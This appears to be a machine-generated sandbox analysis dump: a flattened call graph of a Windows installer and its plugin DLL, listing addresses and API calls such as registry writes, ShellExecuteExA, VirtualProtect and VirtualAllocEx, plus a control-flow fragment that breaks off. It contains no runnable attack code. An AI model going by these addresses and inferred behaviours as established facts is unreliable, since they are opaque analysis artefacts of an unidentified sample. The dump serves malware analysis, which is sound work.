4759->4760 4761 402677 4760->4761 4762 405d08 ReadFile 4761->4762 4763 4026e7 4761->4763 4765 4026f7 4761->4765 4767 4026e5 4761->4767 4762->4761 4768 406055 wsprintfA 4763->4768 4766 40270d SetFilePointer 4765->4766 4765->4767 4766->4767 4768->4767 5184 701a1837 5185 701a185a 5184->5185 5186 701a188a GlobalFree 5185->5186 5187 701a189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5185->5187 5186->5187 5188 701a1266 2 API calls 5187->5188 5189 701a1a1e GlobalFree GlobalFree 5188->5189 5190 40236d 5191 402374 5190->5191 5194 402387 5190->5194 5192 40618a 17 API calls 5191->5192 5193 402381 5192->5193 5193->5194 5195 405813 MessageBoxIndirectA 5193->5195 5195->5194 5196 4019ed 5197 402bce 17 API calls 5196->5197 5198 4019f4 5197->5198 5199 402bce 17 API calls 5198->5199 5200 4019fd 5199->5200 5201 401a04 lstrcmpiA 5200->5201 5202 401a16 lstrcmpA 5200->5202 5203 401a0a 5201->5203 5202->5203 5204 40296e 5205 402bac 17 API calls 5204->5205 5206 402974 5205->5206 5207 4029af 5206->5207 5208 4027bf 5206->5208 5210 402986 5206->5210 5207->5208 5209 40618a 17 API calls 5207->5209 5209->5208 5210->5208 5212 406055 wsprintfA 5210->5212 5212->5208 5213 4014f4 SetForegroundWindow 5214 402a5a 5213->5214 4805 402476 4806 402bce 17 API calls 4805->4806 4807 402488 4806->4807 4808 402bce 17 API calls 4807->4808 4809 402492 4808->4809 4822 402c5e 4809->4822 4812 402a5a 4813 402bce 17 API calls 4817 4024c0 lstrlenA 4813->4817 4814 4024d3 4816 4024f5 RegSetValueExA 4814->4816 4819 4030d8 31 API calls 4814->4819 4815 4024c7 4815->4814 4818 402bac 17 API calls 4815->4818 4820 40250b RegCloseKey 4816->4820 4817->4815 4818->4814 4819->4816 4820->4812 4823 402c79 4822->4823 4826 405fab 4823->4826 4827 405fba 4826->4827 4828 4024a2 4827->4828 4829 405fc5 RegCreateKeyExA 4827->4829 4828->4812 4828->4813 4828->4815 4829->4828 5215 402777 5216 40277d 5215->5216 5217 402781 FindNextFileA 5216->5217 5219 402793 5216->5219 5218 4027d2 5217->5218 5217->5219 5221 4060f7 lstrcpynA 5218->5221 5221->5219 5222 401ef9 5223 402bce 17 API calls 5222->5223 5224 401eff 5223->5224 5225 402bce 17 API calls 5224->5225 5226 401f08 5225->5226 5227 402bce 17 API calls 5226->5227 5228 401f11 5227->5228 5229 402bce 17 API calls 5228->5229 5230 401f1a 5229->5230 5231 401423 24 API calls 5230->5231 5232 401f21 5231->5232 5239 4057d9 ShellExecuteExA 5232->5239 5234 401f5c 5235 406575 5 API calls 5234->5235 5236 4027bf 5234->5236 5237 401f76 CloseHandle 5235->5237 5237->5236 5239->5234 4830 701a2921 4831 701a2971 4830->4831 4832 701a2931 VirtualProtect 4830->4832 4832->4831 4833 401f7b 4834 402bce 17 API calls 4833->4834 4835 401f81 4834->4835 4836 40521e 24 API calls 4835->4836 4837 401f8b 4836->4837 4838 405796 2 API calls 4837->4838 4839 401f91 4838->4839 4843 4027bf 4839->4843 4847 401fb2 CloseHandle 4839->4847 4848 406575 WaitForSingleObject 4839->4848 4842 401fa6 4844 401fb4 4842->4844 4845 401fab 4842->4845 4844->4847 4853 406055 wsprintfA 4845->4853 4847->4843 4849 40658f 4848->4849 4850 4065a1 GetExitCodeProcess 4849->4850 4851 40653c 2 API calls 4849->4851 4850->4842 4852 406596 WaitForSingleObject 4851->4852 4852->4849 4853->4847 5240 401ffb 5241 402bce 17 API calls 5240->5241 5242 402002 5241->5242 5243 406500 5 API calls 5242->5243 5244 402011 5243->5244 5245 402029 GlobalAlloc 5244->5245 5248 402091 5244->5248 5246 40203d 5245->5246 5245->5248 5247 406500 5 API calls 5246->5247 5249 402044 5247->5249 5250 406500 5 API calls 5249->5250 5251 40204e 5250->5251 5251->5248 5255 406055 wsprintfA 5251->5255 5253 402085 5256 406055 wsprintfA 5253->5256 5255->5253 5256->5248 5257 4018fd 5258 401934 5257->5258 5259 402bce 17 API calls 5258->5259 5260 401939 5259->5260 5261 4058bf 67 API calls 5260->5261 5262 401942 5261->5262 5263 401000 5264 401037 BeginPaint GetClientRect 5263->5264 5265 40100c DefWindowProcA 5263->5265 5267 4010f3 5264->5267 5268 401179 5265->5268 5269 401073 CreateBrushIndirect FillRect DeleteObject 5267->5269 5270 4010fc 5267->5270 5269->5267 5271 401102 CreateFontIndirectA 5270->5271 5272 401167 EndPaint 5270->5272 5271->5272 5273 401112 6 API calls 5271->5273 5272->5268 5273->5272 5274 701a225a 5275 701a22c4 5274->5275 5276 701a22cf GlobalAlloc 5275->5276 5277 701a22ee 5275->5277 5276->5275 5278 401900 5279 402bce 17 API calls 5278->5279 5280 401907 5279->5280 5281 405813 MessageBoxIndirectA 5280->5281 5282 401910 5281->5282 5283 404b80 GetDlgItem GetDlgItem 5284 404bd6 7 API calls 5283->5284 5288 404dfd 5283->5288 5285 404c72 SendMessageA 5284->5285 5286 404c7e DeleteObject 5284->5286 5285->5286 5287 404c89 5286->5287 5289 404cc0 5287->5289 5291 40618a 17 API calls 5287->5291 5301 404edf 5288->5301 5312 404e6c 5288->5312 5337 404ace SendMessageA 5288->5337 5292 40417b 18 API calls 5289->5292 5290 404f8b 5294 404f95 SendMessageA 5290->5294 5295 404f9d 5290->5295 5296 404ca2 SendMessageA SendMessageA 5291->5296 5297 404cd4 5292->5297 5293 404df0 5302 4041e2 8 API calls 5293->5302 5294->5295 5307 404fb6 5295->5307 5308 404faf ImageList_Destroy 5295->5308 5313 404fc6 5295->5313 5296->5287 5298 40417b 18 API calls 5297->5298 5316 404ce5 5298->5316 5299 404f38 SendMessageA 5299->5293 5305 404f4d SendMessageA 5299->5305 5300 404ed1 SendMessageA 5300->5301 5301->5290 5301->5293 5301->5299 5306 40518b 5302->5306 5304 40513f 5304->5293 5314 405151 ShowWindow GetDlgItem ShowWindow 5304->5314 5310 404f60 5305->5310 5311 404fbf GlobalFree 5307->5311 5307->5313 5308->5307 5309 404dbf GetWindowLongA SetWindowLongA 5315 404dd8 5309->5315 5321 404f71 SendMessageA 5310->5321 5311->5313 5312->5300 5312->5301 5313->5304 5329 405001 5313->5329 5342 404b4e 5313->5342 5314->5293 5317 404df5 5315->5317 5318 404ddd ShowWindow 5315->5318 5316->5309 5320 404d37 SendMessageA 5316->5320 5322 404dba 5316->5322 5324 404d75 SendMessageA 5316->5324 5325 404d89 SendMessageA 5316->5325 5336 4041b0 SendMessageA 5317->5336 5335 4041b0 SendMessageA 5318->5335 5320->5316 5321->5290 5322->5309 5322->5315 5324->5316 5325->5316 5327 40510b 5328 405115 InvalidateRect 5327->5328 5331 405121 5327->5331 5328->5331 5330 40502f SendMessageA 5329->5330 5334 405045 5329->5334 5330->5334 5331->5304 5351 404a89 5331->5351 5333 4050b9 SendMessageA SendMessageA 5333->5334 5334->5327 5334->5333 5335->5293 5336->5288 5338 404af1 GetMessagePos ScreenToClient SendMessageA 5337->5338 5339 404b2d SendMessageA 5337->5339 5340 404b25 5338->5340 5341 404b2a 5338->5341 5339->5340 5340->5312 5341->5339 5354 4060f7 lstrcpynA 5342->5354 5344 404b61 5355 406055 wsprintfA 5344->5355 5346 404b6b 5347 40140b 2 API calls 5346->5347 5348 404b74 5347->5348 5356 4060f7 lstrcpynA 5348->5356 5350 404b7b 5350->5329 5357 4049c4 5351->5357 5353 404a9e 5353->5304 5354->5344 5355->5346 5356->5350 5358 4049da 5357->5358 5359 40618a 17 API calls 5358->5359 5360 404a3e 5359->5360 5361 40618a 17 API calls 5360->5361 5362 404a49 5361->5362 5363 40618a 17 API calls 5362->5363 5364 404a5f lstrlenA wsprintfA SetDlgItemTextA 5363->5364 5364->5353 5365 701a1058 5367 701a1074 5365->5367 5366 701a10dc 5367->5366 5368 701a1091 5367->5368 5369 701a14bb GlobalFree 5367->5369 5370 701a14bb GlobalFree 5368->5370 5369->5368 5371 701a10a1 5370->5371 5372 701a10a8 GlobalSize 5371->5372 5373 701a10b1 5371->5373 5372->5373 5374 701a10b5 GlobalAlloc 5373->5374 5376 701a10c6 5373->5376 5375 701a14e2 3 API calls 5374->5375 5375->5376 5377 701a10d1 GlobalFree 5376->5377 5377->5366 5378 401502 5379 40150a 5378->5379 5381 40151d 5378->5381 5380 402bac 17 API calls 5379->5380 5380->5381 5382 402604 5383 402bce 17 API calls 5382->5383 5384 40260b 5383->5384 5387 405c90 GetFileAttributesA CreateFileA 5384->5387 5386 402617 5387->5386 5388 401b87 5389 401b94 5388->5389 5390 401bd8 5388->5390 5391 401c1c 5389->5391 5396 401bab 5389->5396 5392 401c01 GlobalAlloc 5390->5392 5393 401bdc 5390->5393 5394 40618a 17 API calls 5391->5394 5402 402387 5391->5402 5395 40618a 17 API calls 5392->5395 5393->5402 5409 4060f7 lstrcpynA 5393->5409 5397 402381 5394->5397 5395->5391 5407 4060f7 lstrcpynA 5396->5407 5397->5402 5403 405813 MessageBoxIndirectA 5397->5403 5400 401bee GlobalFree 5400->5402 5401 401bba 5408 4060f7 lstrcpynA 5401->5408 5403->5402 5405 401bc9 5410 4060f7 lstrcpynA 5405->5410 5407->5401 5408->5405 5409->5400 5410->5402 4376 402588 4388 402c0e 4376->4388 4379 402bac 17 API calls 4380 40259b 4379->4380 4381 4025a9 4380->4381 4382 4027bf 4380->4382 4383 4025c2 RegEnumValueA 4381->4383 4384 4025b6 RegEnumKeyA 4381->4384 4385 4025d7 4383->4385 4386 4025de RegCloseKey 4383->4386 4384->4386 4385->4386 4386->4382 4389 402bce 17 API calls 4388->4389 4390 402c25 4389->4390 4391 405f7d RegOpenKeyExA 4390->4391 4392 402592 4391->4392 4392->4379 4393 401389 4395 401390 4393->4395 4394 4013fe 4395->4394 4396 4013cb MulDiv SendMessageA 4395->4396 4396->4395 5411 701a15d1 5412 701a14bb GlobalFree 5411->5412 5415 701a15e9 5412->5415 5413 701a162f GlobalFree 5414 701a1604 5414->5413 5415->5413 5415->5414 5416 701a161b VirtualFree 5415->5416 5416->5413 5417 40460d 5418 404639 5417->5418 5419 40464a 5417->5419 5478 4057f7 GetDlgItemTextA 5418->5478 5421 404656 GetDlgItem 5419->5421 5428 4046b5 5419->5428 5422 40466a 5421->5422 5426 40467e SetWindowTextA 5422->5426 5431 405b28 4 API calls 5422->5431 5423 404799 5427 404943 5423->5427 5480 4057f7 GetDlgItemTextA 5423->5480 5424 404644 5425 4063d2 5 API calls 5424->5425 5425->5419 5432 40417b 18 API calls 5426->5432 5430 4041e2 8 API calls 5427->5430 5428->5423 5428->5427 5433 40618a 17 API calls 5428->5433 5435 404957 5430->5435 5436 404674 5431->5436 5437 40469a 5432->5437 5438 404729 SHBrowseForFolderA 5433->5438 5434 4047c9 5439 405b7d 18 API calls 5434->5439 5436->5426 5443 405a8f 3 API calls 5436->5443 5440 40417b 18 API calls 5437->5440 5438->5423 5441 404741 CoTaskMemFree 5438->5441 5442 4047cf 5439->5442 5444 4046a8 5440->5444 5445 405a8f 3 API calls 5441->5445 5481 4060f7 lstrcpynA 5442->5481 5443->5426 5479 4041b0 SendMessageA 5444->5479 5447 40474e 5445->5447 5450 404785 SetDlgItemTextA 5447->5450 5454 40618a 17 API calls 5447->5454 5449 4046ae 5452 406500 5 API calls 5449->5452 5450->5423 5451 4047e6 5453 406500 5 API calls 5451->5453 5452->5428 5460 4047ed 5453->5460 5455 40476d lstrcmpiA 5454->5455 5455->5450 5457 40477e lstrcatA 5455->5457 5456 404829 5482 4060f7 lstrcpynA 5456->5482 5457->5450 5459 404830 5461 405b28 4 API calls 5459->5461 5460->5456 5465 405ad6 2 API calls 5460->5465 5466 404881 5460->5466 5462 404836 GetDiskFreeSpaceA 5461->5462 5464 40485a MulDiv 5462->5464 5462->5466 5464->5466 5465->5460 5467 4048f2 5466->5467 5469 404a89 20 API calls 5466->5469 5468 404915 5467->5468 5470 40140b 2 API calls 5467->5470 5483 40419d EnableWindow 5468->5483 5471 4048df 5469->5471 5470->5468 5473 4048f4 SetDlgItemTextA 5471->5473 5474 4048e4 5471->5474 5473->5467 5475 4049c4 20 API calls 5474->5475 5475->5467 5476 404931 5476->5427 5477 404566 SendMessageA 5476->5477 5477->5427 5478->5424 5479->5449 5480->5434 5481->5451 5482->5459 5483->5476 5484 401490 5485 40521e 24 API calls 5484->5485 5486 401497 5485->5486 5487 405192 5488 4051a2 5487->5488 5489 4051b6 5487->5489 5490 4051a8 5488->5490 5499 4051ff 5488->5499 5491 4051d5 5489->5491 5492 4051be IsWindowVisible 5489->5492 5494 4041c7 SendMessageA 5490->5494 5493 405204 CallWindowProcA 5491->5493 5498 404b4e 4 API calls 5491->5498 5495 4051cb 5492->5495 5492->5499 5497 4051b2 5493->5497 5494->5497 5496 404ace 5 API calls 5495->5496 5496->5491 5498->5499 5499->5493 4402 402516 4403 402c0e 17 API calls 4402->4403 4404 402520 4403->4404 4405 402bce 17 API calls 4404->4405 4406 402529 4405->4406 4407 402533 RegQueryValueExA 4406->4407 4409 4027bf 4406->4409 4408 402553 4407->4408 4410 402559 RegCloseKey 4407->4410 4408->4410 4413 406055 wsprintfA 4408->4413 4410->4409 4413->4410 4456 40239c 4457 4023a4 4456->4457 4459 4023aa 4456->4459 4458 402bce 17 API calls 4457->4458 4458->4459 4460 402bce 17 API calls 4459->4460 4461 4023ba 4459->4461 4460->4461 4462 4023c8 4461->4462 4463 402bce 17 API calls 4461->4463 4464 402bce 17 API calls 4462->4464 4463->4462 4465 4023d1 WritePrivateProfileStringA 4464->4465 4466 40209d 4467 40215d 4466->4467 4468 4020af 4466->4468 4470 401423 24 API calls 4467->4470 4469 402bce 17 API calls 4468->4469 4471 4020b6 4469->4471 4476 4022e2 4470->4476 4472 402bce 17 API calls 4471->4472 4473 4020bf 4472->4473 4474 4020d4 LoadLibraryExA 4473->4474 4475 4020c7 GetModuleHandleA 4473->4475 4474->4467 4477 4020e4 GetProcAddress 4474->4477 4475->4474 4475->4477 4478 402130 4477->4478 4479 4020f3 4477->4479 4480 40521e 24 API calls 4478->4480 4481 402112 4479->4481 4482 4020fb 4479->4482 4483 402103 4480->4483 4487 701a16db 4481->4487 4529 401423 4482->4529 4483->4476 4485 402151 FreeLibrary 4483->4485 4485->4476 4488 701a170b 4487->4488 4532 701a1a98 4488->4532 4490 701a1712 4491 701a1834 4490->4491 4492 701a172a 4490->4492 4493 701a1723 4490->4493 4491->4483 4566 701a22f1 4492->4566 4583 701a22af 4493->4583 4498 701a178e 4504 701a17dc 4498->4504 4505 701a1794 4498->4505 4499 701a1770 4596 701a24d8 4499->4596 4500 701a1759 4514 701a174f 4500->4514 4593 701a2cc3 4500->4593 4501 701a1740 4503 701a1746 4501->4503 4509 701a1751 4501->4509 4503->4514 4577 701a2a38 4503->4577 4507 701a24d8 11 API calls 4504->4507 4615 701a156b 4505->4615 4512 701a17cd 4507->4512 4508 701a1776 4607 701a1559 4508->4607 4587 701a26b2 4509->4587 4520 701a1823 4512->4520 4621 701a249e 4512->4621 4514->4498 4514->4499 4517 701a24d8 11 API calls 4517->4512 4519 701a1757 4519->4514 4520->4491 4522 701a182d GlobalFree 4520->4522 4522->4491 4526 701a180f 4526->4520 4625 701a14e2 wsprintfA 4526->4625 4527 701a1808 FreeLibrary 4527->4526 4530 40521e 24 API calls 4529->4530 4531 401431 4530->4531 4531->4483 4628 701a1215 GlobalAlloc 4532->4628 4534 701a1abf 4629 701a1215 GlobalAlloc 4534->4629 4536 701a1d00 GlobalFree GlobalFree GlobalFree 4537 701a1d1d 4536->4537 4548 701a1d67 4536->4548 4538 701a20f1 4537->4538 4546 701a1d32 4537->4546 4537->4548 4540 701a2113 GetModuleHandleA 4538->4540 4538->4548 4539 701a1bbd GlobalAlloc 4556 701a1aca 4539->4556 4543 701a2139 4540->4543 4544 701a2124 LoadLibraryA 4540->4544 4541 701a1c08 lstrcpyA 4545 701a1c12 lstrcpyA 4541->4545 4542 701a1c26 GlobalFree 4542->4556 4636 701a15c2 GetProcAddress 4543->4636 4544->4543 4544->4548 4545->4556 4546->4548 4632 701a1224 4546->4632 4548->4490 4549 701a218a 4549->4548 4553 701a2197 lstrlenA 4549->4553 4550 701a1fb7 4635 701a1215 GlobalAlloc 4550->4635 4637 701a15c2 GetProcAddress 4553->4637 4554 701a214b 4554->4549 4564 701a2174 GetProcAddress 4554->4564 4556->4536 4556->4539 4556->4541 4556->4542 4556->4545 4556->4548 4556->4550 4557 701a1ef9 GlobalFree 4556->4557 4558 701a2033 4556->4558 4559 701a1224 2 API calls 4556->4559 4560 701a1c64 4556->4560 4557->4556 4558->4548 4563 701a208c lstrcpyA 4558->4563 4559->4556 4560->4556 4630 701a1534 GlobalSize GlobalAlloc 4560->4630 4561 701a21b0 4561->4548 4563->4548 4564->4549 4565 701a1fbf 4565->4490 4574 701a230a 4566->4574 4568 701a2446 GlobalFree 4569 701a1730 4568->4569 4568->4574 4569->4500 4569->4501 4569->4514 4570 701a23b8 GlobalAlloc MultiByteToWideChar 4572 701a23e4 GlobalAlloc 4570->4572 4573 701a2405 4570->4573 4571 701a1224 GlobalAlloc lstrcpynA 4571->4574 4575 701a23fc GlobalFree 4572->4575 4573->4568 4643 701a2646 4573->4643 4574->4568 4574->4570 4574->4571 4574->4573 4639 701a12ad 4574->4639 4575->4568 4578 701a2a4a 4577->4578 4579 701a2aef VirtualAllocEx 4578->4579 4582 701a2b0d 4579->4582 4581 701a2bd9 4581->4514 4646 701a29e4 4582->4646 4584 701a22c4 4583->4584 4585 701a22cf GlobalAlloc 4584->4585 4586 701a1729 4584->4586 4585->4584 4586->4492 4591 701a26e2 4587->4591 4588 701a277d GlobalAlloc 4592 701a27a0 4588->4592 4589 701a2790 4590 701a2796 GlobalSize 4589->4590 4589->4592 4590->4592 4591->4588 4591->4589 4592->4519 4594 701a2cce 4593->4594 4595 701a2d0e GlobalFree 4594->4595 4650 701a1215 GlobalAlloc 4596->4650 4598 701a2598 WideCharToMultiByte 4605 701a24e4 4598->4605 4599 701a2563 lstrcpynA 4599->4605 4600 701a2574 StringFromGUID2 WideCharToMultiByte 4600->4605 4601 701a25b9 wsprintfA 4601->4605 4602 701a25dd GlobalFree 4602->4605 4603 701a2617 GlobalFree 4603->4508 4604 701a1266 2 API calls 4604->4605 4605->4598 4605->4599 4605->4600 4605->4601 4605->4602 4605->4603 4605->4604 4651 701a12d1 4605->4651 4655 701a1215 GlobalAlloc 4607->4655 4609 701a155e 4610 701a156b 2 API calls 4609->4610 4611 701a1568 4610->4611 4612 701a1266 4611->4612 4613 701a12a8 GlobalFree 4612->4613 4614 701a126f GlobalAlloc lstrcpynA 4612->4614 4613->4512 4614->4613 4616 701a1577 wsprintfA 4615->4616 4617 701a15a4 lstrcpyA 4615->4617 4620 701a15bd 4616->4620 4617->4620 4620->4517 4622 701a24ac 4621->4622 4623 701a17ef 4621->4623 4622->4623 4624 701a24c5 GlobalFree 4622->4624 4623->4526 4623->4527 4624->4622 4626 701a1266 2 API calls 4625->4626 4627 701a1503 4626->4627 4627->4520 4628->4534 4629->4556 4631 701a1552 4630->4631 4631->4560 4638 701a1215 GlobalAlloc 4632->4638 4634 701a1233 lstrcpynA 4634->4548 4635->4565 4636->4554 4637->4561 4638->4634 4640 701a12b4 4639->4640 4641 701a1224 2 API calls 4640->4641 4642 701a12cf 4641->4642 4642->4574 4644 701a26aa 4643->4644 4645 701a2654 VirtualAlloc 4643->4645 4644->4573 4645->4644 4647 701a29ef 4646->4647 4648 701a29ff 4647->4648 4649 701a29f4 GetLastError 4647->4649 4648->4581 4649->4648 4650->4605 4652 701a12da 4651->4652 4653 701a12f9 4651->4653 4652->4653 4654 701a12e0 lstrcpyA 4652->4654 4653->4605 4654->4653 4655->4609 4656 40159d 4657 402bce 17 API calls 4656->4657 4658 4015a4 SetFileAttributesA 4657->4658 4659 4015b6 4658->4659 5500 40149d 5501 402387 5500->5501 5502 4014ab PostQuitMessage 5500->5502 5502->5501 4660 401a1e 4661 402bce 17 API calls 4660->4661 4662 401a27 ExpandEnvironmentStringsA 4661->4662 4663 401a3b 4662->4663 4665 401a4e 4662->4665 4664 401a40 lstrcmpA 4663->4664 4663->4665 4664->4665 4666 40171f 4667 402bce 17 API calls 4666->4667 4668 401726 SearchPathA 4667->4668 4669 401741 4668->4669 5508 401d1f 5509 402bac 17 API calls 5508->5509 5510 401d26 5509->5510 5511 402bac 17 API calls 5510->5511 5512 401d32 GetDlgItem 5511->5512 5513 402620 5512->5513 4677 402421 4678 402453 4677->4678 4679 402428 4677->4679 4680 402bce 17 API calls 4678->4680 4681 402c0e 17 API calls 4679->4681 4682 40245a 4680->4682 4683 40242f 4681->4683 4689 402c8c 4682->4689 4685 402439 4683->4685 4688 402467 4683->4688 4686 402bce 17 API calls 4685->4686 4687 402440 RegDeleteValueA RegCloseKey 4686->4687 4687->4688 4690 402c98 4689->4690 4691 402c9f 4689->4691 4690->4688 4691->4690 4693 402cd0 4691->4693 4694 405f7d RegOpenKeyExA 4693->4694 4695 402cfe 4694->4695 4696 402db3 4695->4696 4697 402d08 4695->4697 4696->4690 4698 402d0e RegEnumValueA 4697->4698 4702 402d31 4697->4702 4699 402d98 RegCloseKey 4698->4699 4698->4702 4699->4696 4700 402d6d RegEnumKeyA 4701 402d76 RegCloseKey 4700->4701 4700->4702 4703 406500 5 API calls 4701->4703 4702->4699 4702->4700 4702->4701 4704 402cd0 6 API calls 4702->4704 4705 402d86 4703->4705 4704->4702 4706 402da8 4705->4706 4707 402d8a RegDeleteKeyA 4705->4707 4706->4696 4707->4696 4708 4027a1 4709 402bce 17 API calls 4708->4709 4710 4027a8 FindFirstFileA 4709->4710 4711 4027cb 4710->4711 4712 4027bb 4710->4712 4713 4027d2 4711->4713 4716 406055 wsprintfA 4711->4716 4717 4060f7 lstrcpynA 4713->4717 4716->4713 4717->4712 5514 402626 5515 40262b 5514->5515 5516 40263f 5514->5516 5517 402bac 17 API calls 5515->5517 5518 402bce 17 API calls 5516->5518 5520 402634 5517->5520 5519 402646 lstrlenA 5518->5519 5519->5520 5521 402668 5520->5521 5522 405d37 WriteFile 5520->5522 5522->5521 5523 403ca7 5524 403dfa 5523->5524 5525 403cbf 5523->5525 5527 403e4b 5524->5527 5528 403e0b GetDlgItem GetDlgItem 5524->5528 5525->5524 5526 403ccb 5525->5526 5529 403cd6 SetWindowPos 5526->5529 5530 403ce9 5526->5530 5532 403ea5 5527->5532 5537 401389 2 API calls 5527->5537 5531 40417b 18 API calls 5528->5531 5529->5530 5534 403d06 5530->5534 5535 403cee ShowWindow 5530->5535 5536 403e35 SetClassLongA 5531->5536 5533 4041c7 SendMessageA 5532->5533 5583 403df5 5532->5583 5581 403eb7 5533->5581 5538 403d28 5534->5538 5539 403d0e DestroyWindow 5534->5539 5535->5534 5540 40140b 2 API calls 5536->5540 5541 403e7d 5537->5541 5542 403d2d SetWindowLongA 5538->5542 5543 403d3e 5538->5543 5591 404104 5539->5591 5540->5527 5541->5532 5544 403e81 SendMessageA 5541->5544 5542->5583 5547 403db5 5543->5547 5548 403d4a GetDlgItem 5543->5548 5544->5583 5545 40140b 2 API calls 5545->5581 5546 404106 DestroyWindow EndDialog 5546->5591 5551 4041e2 8 API calls 5547->5551 5549 403d7a 5548->5549 5550 403d5d SendMessageA IsWindowEnabled 5548->5550 5554 403d87 5549->5554 5555 403dce SendMessageA 5549->5555 5556 403d9a 5549->5556 5563 403d7f 5549->5563 5550->5549 5550->5583 5551->5583 5552 404135 ShowWindow 5552->5583 5553 40618a 17 API calls 5553->5581 5554->5555 5554->5563 5555->5547 5559 403da2 5556->5559 5560 403db7 5556->5560 5557 404154 SendMessageA 5557->5547 5558 40417b 18 API calls 5558->5581 5562 40140b 2 API calls 5559->5562 5561 40140b 2 API calls 5560->5561 5561->5563 5562->5563 5563->5547 5563->5557 5564 40417b 18 API calls 5565 403f32 GetDlgItem 5564->5565 5566 403f47 5565->5566 5567 403f4f ShowWindow EnableWindow 5565->5567 5566->5567 5592 40419d EnableWindow 5567->5592 5569 403f79 EnableWindow 5574 403f8d 5569->5574 5570 403f92 GetSystemMenu EnableMenuItem SendMessageA 5571 403fc2 SendMessageA 5570->5571 5570->5574 5571->5574 5573 403c88 18 API calls 5573->5574 5574->5570 5574->5573 5593 4041b0 SendMessageA 5574->5593 5594 4060f7 lstrcpynA 5574->5594 5576 403ff1 lstrlenA 5577 40618a 17 API calls 5576->5577 5578 404002 SetWindowTextA 5577->5578 5579 401389 2 API calls 5578->5579 5579->5581 5580 404046 DestroyWindow 5582 404060 CreateDialogParamA 5580->5582 5580->5591 5581->5545 5581->5546 5581->5553 5581->5558 5581->5564 5581->5580 5581->5583 5584 404093 5582->5584 5582->5591 5585 40417b 18 API calls 5584->5585 5586 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5585->5586 5587 401389 2 API calls 5586->5587 5588 4040e4 5587->5588 5588->5583 5589 4040ec ShowWindow 5588->5589 5590 4041c7 SendMessageA 5589->5590 5590->5591 5591->5552 5591->5583 5592->5569 5593->5574 5594->5576 4750 40272b 4751 402732 4750->4751 4757 4029aa 4750->4757 4752 402bac 17 API calls 4751->4752 4753 402739 4752->4753 4754 402748 SetFilePointer 4753->4754 4755 402758 4754->4755 4754->4757 4758 406055 wsprintfA 4755->4758 4758->4757 4769 401c2e 4770 402bac 17 API calls 4769->4770 4771 401c35 4770->4771 4772 402bac 17 API calls 4771->4772 4773 401c42 4772->4773 4774 401c57 4773->4774 4775 402bce 17 API calls 4773->4775 4776 401c67 4774->4776 4777 402bce 17 API calls 4774->4777 4775->4774 4778 401c72 4776->4778 4779 401cbe 4776->4779 4777->4776 4781 402bac 17 API calls 4778->4781 4780 402bce 17 API calls 4779->4780 4782 401cc3 4780->4782 4783 401c77 4781->4783 4784 402bce 17 API calls 4782->4784 4785 402bac 17 API calls 4783->4785 4786 401ccc FindWindowExA 4784->4786 4787 401c83 4785->4787 4790 401cea 4786->4790 4788 401c90 SendMessageTimeoutA 4787->4788 4789 401cae SendMessageA 4787->4789 4788->4790 4789->4790 5595 4042b1 lstrcpynA lstrlenA 4797 401e35 GetDC 4798 402bac 17 API calls 4797->4798 4799 401e47 GetDeviceCaps MulDiv ReleaseDC 4798->4799 4800 402bac 17 API calls 4799->4800 4801 401e78 4800->4801 4802 40618a 17 API calls 4801->4802 4803 401eb5 CreateFontIndirectA 4802->4803 4804 402620 4803->4804 5596 402a35 SendMessageA 5597 402a5a 5596->5597 5598 402a4f InvalidateRect 5596->5598 5598->5597 5599 4014b7 5600 4014bd 5599->5600 5601 401389 2 API calls 5600->5601 5602 4014c5 5601->5602 5603 701a2be3 5604 701a2bfb 5603->5604 5605 701a1534 2 API calls 5604->5605 5606 701a2c16 5605->5606 5607 701a10e0 5611 701a110e 5607->5611 5608 701a11c4 GlobalFree 5609 701a12ad 2 API calls 5609->5611 5610 701a11c3 5610->5608 5611->5608 5611->5609 5611->5610 5612 701a1155 GlobalAlloc 5611->5612 5613 701a11ea GlobalFree 5611->5613 5614 701a1266 2 API calls 5611->5614 5615 701a12d1 lstrcpyA 5611->5615 5616 701a11b1 GlobalFree 5611->5616 5612->5611 5613->5611 5614->5616 5615->5611 5616->5611 5617 402dba 5618 402de2 5617->5618 5619 402dc9 SetTimer 5617->5619 5620 402e37 5618->5620 5621 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5618->5621 5619->5618 5621->5620 4854 4015bb 4855 402bce 17 API calls 4854->4855 4856 4015c2 4855->4856 4857 405b28 4 API calls 4856->4857 4870 4015ca 4857->4870 4858 401624 4860 401652 4858->4860 4861 401629 4858->4861 4859 405aba CharNextA 4859->4870 4863 401423 24 API calls 4860->4863 4862 401423 24 API calls 4861->4862 4864 401630 4862->4864 4867 40164a 4863->4867 4873 4060f7 lstrcpynA 4864->4873 4866 405761 2 API calls 4866->4870 4868 40577e 5 API calls 4868->4870 4869 40163b SetCurrentDirectoryA 4869->4867 4870->4858 4870->4859 4870->4866 4870->4868 4871 40160c GetFileAttributesA 4870->4871 4872 4056e4 4 API calls 4870->4872 4871->4870 4872->4870 4873->4869 5622 4016bb 5623 402bce 17 API calls 5622->5623 5624 4016c1 GetFullPathNameA 5623->5624 5625 4016d8 5624->5625 5631 4016f9 5624->5631 5628 40646b 2 API calls 5625->5628 5625->5631 5626 402a5a 5627 40170d GetShortPathNameA 5627->5626 5629 4016e9 5628->5629 5629->5631 5632 4060f7 lstrcpynA 5629->5632 5631->5626 5631->5627 5632->5631

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 403348-403387 SetErrorMode GetVersion 1 403389-403391 call 406500 0->1 2 40339a 0->2 1->2 7 403393 1->7 4 40339f-4033b2 call 406492 lstrlenA 2->4 9 4033b4-4033d0 call 406500 * 3 4->9 7->2 16 4033e1-40343f #17 OleInitialize SHGetFileInfoA call 4060f7 GetCommandLineA call 4060f7 9->16 17 4033d2-4033d8 9->17 24 403441-403446 16->24 25 40344b-403460 call 405aba CharNextA 16->25 17->16 21 4033da 17->21 21->16 24->25 28 403525-403529 25->28 29 403465-403468 28->29 30 40352f 28->30 31 403470-403478 29->31 32 40346a-40346e 29->32 33 403542-40355c GetTempPathA call 403317 30->33 34 403480-403483 31->34 35 40347a-40347b 31->35 32->31 32->32 42 4035b4-4035ce DeleteFileA call 402ea1 33->42 43 40355e-40357c GetWindowsDirectoryA lstrcatA call 403317 33->43 37 403515-403522 call 405aba 34->37 38 403489-40348d 34->38 35->34 37->28 53 403524 37->53 40 4034a5-4034d2 38->40 41 40348f-403495 38->41 47 4034d4-4034da 40->47 48 4034e5-403513 40->48 45 403497-403499 41->45 